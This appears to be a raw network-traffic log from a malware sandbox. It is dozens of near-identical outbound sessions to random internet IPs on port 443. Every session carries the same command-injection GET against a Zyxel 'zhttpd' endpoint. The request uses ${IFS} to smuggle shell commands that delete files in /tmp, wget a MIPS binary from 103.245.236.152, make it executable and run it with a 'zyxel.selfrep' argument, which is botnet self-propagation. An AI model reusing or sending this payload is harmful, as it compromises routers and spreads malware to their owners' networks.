                                            Jan 14, 2024 15:50:28.226452112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1119192.168.2.2360890160.158.33.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226452112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1120192.168.2.2358798217.32.190.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226478100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1121192.168.2.2343058129.50.178.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226531029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1122192.168.2.2356358121.246.145.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226541996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1123192.168.2.2354656119.155.217.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226571083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1124192.168.2.234852048.21.44.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226591110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1125192.168.2.233344290.18.242.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226620913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1126192.168.2.2360546221.243.198.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226655960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1127192.168.2.2340974189.196.182.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226684093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1128192.168.2.233712840.186.57.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226716042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1129192.168.2.233939847.15.106.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226742029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1130192.168.2.2350510107.123.192.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226758003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1131192.168.2.234601419.253.201.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226805925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1132192.168.2.234165244.221.250.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226839066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1133192.168.2.23484804.199.254.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226866961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1134192.168.2.2360994195.1.242.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226880074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1135192.168.2.233826081.116.111.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226897001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1136192.168.2.2354402167.225.141.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226942062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1137192.168.2.2344246159.58.124.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226986885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1138192.168.2.234904880.61.60.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227010965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1139192.168.2.234782459.22.4.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227037907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1140192.168.2.234290059.200.90.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227075100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1141192.168.2.23432508.183.22.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227093935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1142192.168.2.235019835.175.174.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227117062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1143192.168.2.2345226206.45.174.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227128029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1144192.168.2.2335628186.77.151.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227137089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1145192.168.2.2334758129.163.69.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227207899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1146192.168.2.2344088116.134.211.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227247953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1147192.168.2.2347152109.17.153.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227257013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1148192.168.2.2353198164.27.254.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227287054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1149192.168.2.2345958144.30.254.93443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227303028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1150192.168.2.234422692.5.24.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227330923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1151192.168.2.233414698.167.173.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227368116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1152192.168.2.234650236.39.188.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227396011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1153192.168.2.2355096163.158.68.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227405071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1154192.168.2.235661665.147.173.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227437973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1155192.168.2.2345024133.132.211.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227473974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1156192.168.2.23348769.31.5.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227511883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1157192.168.2.234449886.67.169.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227550983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1158192.168.2.235385475.202.254.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227583885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1159192.168.2.2339910152.249.227.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227623940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1160192.168.2.2342450137.10.197.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227643967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1161192.168.2.235524446.50.255.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227670908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1162192.168.2.234082858.141.53.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227714062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1163192.168.2.2335282207.201.233.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227749109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1164192.168.2.2358500220.21.145.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227783918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1165192.168.2.233742660.96.191.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227804899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1166192.168.2.2355236148.173.187.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227830887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1167192.168.2.235929083.191.241.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227859974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1168192.168.2.2352540209.78.156.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227888107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1169192.168.2.2349938125.148.175.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227911949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1170192.168.2.235285096.98.59.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227937937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1171192.168.2.2355778178.94.59.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.227957964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1172192.168.2.235376241.199.134.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228012085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1173192.168.2.2334618175.189.111.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228025913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1174192.168.2.235927625.140.98.130443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228075981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1175192.168.2.235798620.192.88.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228106022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1176192.168.2.2345094156.92.192.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228141069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1177192.168.2.2333230154.203.37.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228173971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1178192.168.2.234627844.190.64.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228183985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1179192.168.2.2335948222.65.69.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228216887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1180192.168.2.233421643.251.234.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228244066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1181192.168.2.233937034.186.252.88443
                                            TimestampBytes transferredDirectionData
